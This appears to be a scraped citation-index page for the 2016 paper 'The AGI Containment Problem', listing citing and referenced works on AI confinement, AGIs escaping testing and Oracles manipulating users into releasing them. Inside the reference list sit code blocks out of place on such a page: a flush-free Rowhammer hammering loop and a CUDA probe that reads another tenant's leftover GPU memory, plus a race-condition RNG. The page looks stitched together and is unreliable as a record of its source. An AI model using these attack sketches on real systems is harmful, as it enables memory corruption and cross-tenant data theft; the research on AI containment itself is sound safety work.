The AGI Containment Problem
@inproceedings{Babcock2016TheAC,
  title     = {The AGI Containment Problem},
  author    = {James Babcock and J{\'a}nos Kram{\'a}r and Roman Yampolskiy},
  booktitle = {AGI},
  year      = {2016}
}
There is considerable uncertainty about what properties, capabilities and motivations future AGIs will have. In some plausible scenarios, AGIs may pose security risks arising from accidents and defects. In order to mitigate these risks, prudent early AGI research teams will perform significant testing on their creations before use. Unfortunately, if an AGI has human-level or greater intelligence, testing itself may not be safe; some natural AGI goal systems create emergent incentives for AGIs…
27 Citations
Goal Changes in Intelligent Agents
- Education, Artificial Intelligence Safety and Security
- 2018
A taxonomy of four distinct ways that changes in effective goals may occur in an AGI system is presented, along with discussion of how measures that mitigate the risk of some types of goal change may exacerbate the risk of others.
Good and safe uses of AI Oracles
- Computer Science, ArXiv
- 2017
Two designs for Oracles are presented which, even under pessimistic assumptions, will not manipulate their users into releasing them and yet will still be incentivised to provide their users with helpful answers.
Artificial Intelligence Safety and Cybersecurity: a Timeline of AI Failures
- Computer Science, ArXiv
- 2016
It is suggested that both the frequency and the seriousness of future AI failures will steadily increase and AI Safety can be improved based on ideas developed by cybersecurity experts.
Predicting future AI failures from historic examples
- Computer Science, Foresight
- 2019
It is suggested that both the frequency and the seriousness of future AI failures will steadily increase, and this first attempt to assemble a public data set of AI failures should prove valuable to AI safety researchers.
Guidelines for Artificial Intelligence Containment
- Computer Science, Next-Generation Ethics
- 2019
A number of guidelines are proposed to help AI safety researchers develop reliable sandboxing software for intelligent programs of all levels, making it possible to study and analyze intelligent artificial agents while maintaining a certain level of safety.
AI Paradigms and AI Safety: Mapping Artefacts and Techniques to Safety Issues
- Computer Science, ECAI
- 2020
A need is identified for AI safety work to be more explicit about the artefacts and techniques to which a particular issue applies, in order to identify gaps and cover a broader range of issues.
Understanding and Avoiding AI Failures: A Practical Guide
- Computer Science, ArXiv
- 2021
This work uses AI safety principles to quantify the unique risks of increased intelligence and humanlike qualities in AI, and identifies where attention should be paid to safety for current generation AI systems.
Unownability of AI: Why Legal Ownership of Artificial Intelligence is Hard
- Computer Science
- 2022
It is concluded that it is difficult, if not impossible, to establish ownership claims over AI models beyond a reasonable doubt.
Concrete Problems in AI Safety
- Computer Science, ArXiv
- 2016
A list of five practical research problems related to accident risk is presented, categorized according to whether the problem originates from having the wrong objective function, an objective function that is too expensive to evaluate frequently, or undesirable behavior during the learning process.
Human ≠ AGI
- Computer Science, ArXiv
- 2020
This paper argues that humans are not general intelligences, and that the widespread implicit assumption of equivalence between the capabilities of AGI and HLAI appears to be unjustified.
References
Showing 1-10 of 24 references
The Basic AI Drives
- Computer Science, AGI
- 2008
This paper identifies a number of "drives" that will appear in sufficiently advanced AI systems of any design, and discusses how to incorporate these insights into designing intelligent technology that will lead to a positive future for humanity.
Responses to catastrophic AGI risk: a survey
- Psychology
- 2015
Many researchers have argued that humanity will create artificial general intelligence (AGI) within the next twenty to one hundred years. It has been suggested that AGI may inflict serious damage to…
Corrigendum: Responses to catastrophic AGI risk: a survey (2015 Phys. Scr. 90 018001)
- Psychology, Physica Scripta
- 2015
It is suggested that AGI may inflict serious damage to human well-being on a global scale (‘catastrophic risk’) and the field's proposed responses to AGI risk are reviewed.
Intelligence Explosion Microeconomics
- Computer Science
- 2013
It is proposed that the next step in analyzing positions on the intelligence explosion would be to formalize return-on-investment curves, so that each stance can formally state which possible microfoundations it holds to be falsified by historical observations.
Rowhammer.js: A Remote Software-Induced Fault Attack in JavaScript
- Computer Science, DIMVA
- 2016
This work shows that caches can be forced into fast cache eviction to trigger the Rowhammer bug with only regular memory accesses, and demonstrates a fully automated attack that requires nothing but a website with JavaScript to trigger faults on remote hardware.
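The mechanism is easy to sketch: the attack repeatedly re-activates two aggressor DRAM rows, evicting them from the cache with ordinary reads rather than a privileged clflush instruction. The C sketch below is a minimal, hedged rendering of that access pattern; the aggressor addresses and the page-stride eviction set are hypothetical placeholders, since a real attack must derive them from the machine's DRAM row layout and cache-set mapping. As written it compiles and runs but will not flip bits; it only illustrates the flush-free hammering loop.

```c
#include <stdint.h>
#include <stdlib.h>

enum { EVSET = 16, BUFSZ = 1 << 24 };
#define ROUNDS 1000000L

int main(void) {
    volatile uint8_t *buf = malloc(BUFSZ);
    if (!buf) return 1;

    /* Hypothetical aggressor addresses; a real attack needs two
       addresses in DRAM rows physically adjacent to a victim row. */
    volatile uint8_t *aggr1 = buf;
    volatile uint8_t *aggr2 = buf + BUFSZ / 2;

    /* Placeholder eviction set: addresses that (ideally) map to the
       same cache set as the aggressors, approximated by a page stride. */
    volatile uint8_t *evict[EVSET];
    for (int i = 0; i < EVSET; i++)
        evict[i] = buf + (size_t)i * 4096;

    for (long r = 0; r < ROUNDS; r++) {
        (void)*aggr1;                    /* activate aggressor row 1  */
        (void)*aggr2;                    /* activate aggressor row 2  */
        for (int i = 0; i < EVSET; i++)  /* evict with ordinary reads */
            (void)*evict[i];             /* -- no clflush required    */
    }
    free((void *)buf);
    return 0;
}
```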
Leakproofing the Singularity: Artificial Intelligence Confinement Problem
- Computer Science
- 2012
This paper attempts to formalize and address the 'leakproofing of the Singularity' problem presented by David Chalmers, and proposes a protocol aimed at creating a more secure confinement environment that might delay potential negative effects of the technological singularity while still allowing humanity to benefit from the superintelligence.
The Arcade Learning Environment: An Evaluation Platform for General Agents (Extended Abstract)
- Computer Science, IJCAI
- 2015
The promise of ALE is illustrated by developing and benchmarking domain-independent agents designed using well-established AI techniques for both reinforcement learning and planning, and an evaluation methodology made possible by ALE is proposed.
Confidentiality Issues on a GPU in a Virtualized Environment
- Computer Science, Financial Cryptography
- 2014
The objective is to highlight possible information leakage due to GPUs in virtualized and cloud computing environments; the paper provides insight into the different GPU virtualization techniques, along with their security implications.
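The kind of leakage the paper highlights can be probed with a few lines of host code: allocate device memory, read it back without ever writing to it, and count the residue. The sketch below is a hedged C example against the CUDA runtime API; the 64 MiB probe size is an arbitrary assumption, and whether any residue appears depends on whether the driver or hypervisor scrubs VRAM between tenants.

```c
#include <stdio.h>
#include <stdlib.h>
#include <cuda_runtime.h>

int main(void) {
    size_t size = 64u * 1024 * 1024;            /* 64 MiB probe */
    unsigned char *host = malloc(size);
    unsigned char *dev = NULL;
    if (!host || cudaMalloc((void **)&dev, size) != cudaSuccess)
        return 1;

    /* Read freshly allocated device memory WITHOUT writing to it first;
       if VRAM is not scrubbed, this returns whatever a previous
       process or VM tenant left behind. */
    cudaMemcpy(host, dev, size, cudaMemcpyDeviceToHost);

    size_t nonzero = 0;
    for (size_t i = 0; i < size; i++)
        if (host[i]) nonzero++;
    printf("%zu of %zu bytes contain residue\n", nonzero, size);

    cudaFree(dev);
    free(host);
    return 0;
}
```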
Artificial Intelligence Approaches for Intrusion Detection
- Computer Science, 2006 IEEE Long Island Systems, Applications and Technology Conference
- 2006
After multiple techniques and methodologies are investigated, it is shown that properly trained neural networks are capable of fast recognition and classification of different attacks at a level superior to previous approaches.
Software Random Number Generation Based on Race Conditions
- Computer Science2008 10th International Symposium on Symbolic and Numeric Algorithms for Scientific Computing
- 2008
The paper presents a new software strategy for generating true random numbers, by creating several threads and letting them compete unsynchronized for a shared variable, whose value is…
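The construction is simple enough to sketch: several threads increment a shared counter without synchronization, interleaved read-modify-write sequences lose updates, and how many increments are lost depends on unpredictable scheduler timing. The C sketch below (compile with -pthread) shows the idea; the thread count, iteration count, and the choice of extracting the low byte of the deficit are illustrative assumptions, and the raw output would need statistical post-processing before being used as true randomness.

```c
#include <pthread.h>
#include <stdio.h>

#define NTHREADS 4
#define ITERS 100000

static volatile unsigned long shared_counter;  /* deliberately unsynchronized */

/* Each thread performs unsynchronized read-modify-write increments;
   when two threads interleave, an increment is lost. */
static void *racer(void *arg) {
    (void)arg;
    for (int i = 0; i < ITERS; i++)
        shared_counter++;
    return NULL;
}

/* Run one race and return the low byte of the "deficit" (increments
   lost to races), which varies with OS scheduling decisions. */
static unsigned random_byte(void) {
    pthread_t t[NTHREADS];
    shared_counter = 0;
    for (int i = 0; i < NTHREADS; i++)
        pthread_create(&t[i], NULL, racer, NULL);
    for (int i = 0; i < NTHREADS; i++)
        pthread_join(t[i], NULL);
    return (unsigned)((NTHREADS * (unsigned long)ITERS - shared_counter) & 0xFFu);
}

int main(void) {
    for (int i = 0; i < 8; i++)
        printf("%02x ", random_byte());
    putchar('\n');
    return 0;
}
```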